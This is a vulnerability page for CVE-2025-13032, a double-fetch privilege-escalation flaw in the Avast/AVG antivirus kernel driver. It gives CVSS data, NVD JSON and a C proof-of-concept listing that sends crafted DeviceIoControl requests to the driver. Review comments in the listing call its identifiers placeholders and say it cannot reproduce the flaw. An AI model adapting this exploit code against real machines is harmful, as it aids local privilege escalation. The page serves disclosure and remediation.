Security Vulnerability Report
CVE-2025-13032 CVSS 9.9 CRITICAL

CVE-2025-13032

Published: 2025-11-11 17:15:40
Last Modified: 2025-12-08 18:10:03

Description

Double fetch in sandbox kernel driver in Avast/AVG Antivirus <25.3 on Windows allows a local attacker to escalate privileges via pool overflow.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
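CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (the Secondary-type metric in the raw JSON below; the Primary-type metric there is CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, base score 7.8 HIGH, which matches the local-attacker wording of the description)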

Configurations (Affected Products)

cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE (the platform the affected product runs on; joined to the entry above by AND in the raw JSON)
Avast Antivirus < 25.3 (Windows)
AVG Antivirus < 25.3 (Windows)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <windows.h>
#include <stdio.h>

/*
 * CVE-2025-13032 - illustrative listing for the Avast/AVG double-fetch
 * advisory. The page itself describes it as a conceptual PoC.
 *
 * NOTE(review): nothing on this page confirms the device name, the control
 * code 0x80002000, the operation value 0x1337 or the AV_DRIVER_REQUEST
 * layout. The advisory text names the sandbox kernel driver, while main()
 * opens a device called "AswVpnDriver". Treat every identifier below as a
 * placeholder, not as a description of the real driver interface.
 *
 * NOTE(review): a double fetch is a driver-side flaw (the record lists
 * CWE-367): the driver reads the same caller-controlled value more than once
 * while handling a request and assumes it did not change. The driver code is
 * not shown here, and this listing only issues two separate, sequential
 * requests with different contents, so it cannot confirm or reproduce the
 * condition the advisory describes.
 *
 * Defensive reading: the page lists Avast/AVG Antivirus below 25.3 as
 * affected, so the remediation is to run 25.3 or later. For driver authors
 * the general fix for this bug class is to capture caller-supplied data into
 * kernel memory once and to validate and use only that captured copy.
 */

/*
 * Request record handed to the device in this listing.
 * NOTE(review): field meanings are the listing author's labels; the real
 * request format is not documented on this page.
 */
typedef struct _AV_DRIVER_REQUEST {
    ULONG_PTR buffer1; // labelled "first fetch location" by the author
    ULONG_PTR buffer2; // labelled "second fetch location"; set to the same address as buffer1 below
    ULONG size;        // length the request declares (0x100, later 0x200)
    ULONG operation;   // opcode placeholder
} AV_DRIVER_REQUEST, *PAV_DRIVER_REQUEST;

/*
 * Sends two requests to hDevice, enlarging the declared size between them.
 *
 * Returns FALSE only when VirtualAlloc fails; otherwise TRUE, whatever the
 * device answered.
 *
 * NOTE(review): both DeviceIoControl results are discarded, so a rejected
 * request is indistinguishable from an accepted one. Both calls also pass
 * NULL for lpBytesReturned together with a NULL lpOverlapped, which the
 * DeviceIoControl documentation does not allow.
 */
BOOL TriggerDoubleFetch(HANDLE hDevice) {
    AV_DRIVER_REQUEST req = {0};
    // One committed read/write page (0x1000 bytes) of user memory.
    PVOID userBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE);
    if (!userBuffer) return FALSE;

    // Both pointer fields reference the same user page.
    req.buffer1 = (ULONG_PTR)userBuffer;
    req.buffer2 = (ULONG_PTR)userBuffer;
    req.size = 0x100;
    req.operation = 0x1337;

    // First request: declared size 0x100, buffer still zero-filled.
    DeviceIoControl(hDevice, 0x80002000, &req, sizeof(req), NULL, 0, NULL, NULL);

    // NOTE(review): the first call has already returned at this point, so
    // this pause separates two independent requests.
    Sleep(1);

    // Fill 0x200 bytes of the page (still inside the 0x1000 allocation) and
    // raise the declared size to match.
    memset(userBuffer, 0x41, 0x200);
    req.size = 0x200;

    // Second request: same control code, larger declared size.
    DeviceIoControl(hDevice, 0x80002000, &req, sizeof(req), NULL, 0, NULL, NULL);

    VirtualFree(userBuffer, 0, MEM_RELEASE);
    return TRUE;
}

/*
 * Opens the device, calls TriggerDoubleFetch once and closes the handle.
 * Returns 1 when the device cannot be opened, 0 otherwise.
 *
 * NOTE(review): the "\\n" in both printf strings prints a literal backslash
 * followed by 'n' rather than a newline; this looks like an escaping artifact
 * of the page.
 */
int main() {
    HANDLE hDevice = CreateFile("\\\\.\\AswVpnDriver", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device\\n");
        return 1;
    }
    printf("[*] Triggering CVE-2025-13032 Double Fetch...\\n");
    TriggerDoubleFetch(hDevice); // return value not inspected
    CloseHandle(hDevice);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13032", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:39.700", "lastModified": "2025-12-08T18:10:03.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Double fetch in sandbox kernel driver in Avast/AVG Antivirus <25.3  on windows allows local attacker to escalate privelages via pool overflow."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3", "matchCriteriaId": "E711903A-5520-4157-BD8D-B059395910B4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.gendigital.com/us/en/contact-us/security-advisories/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}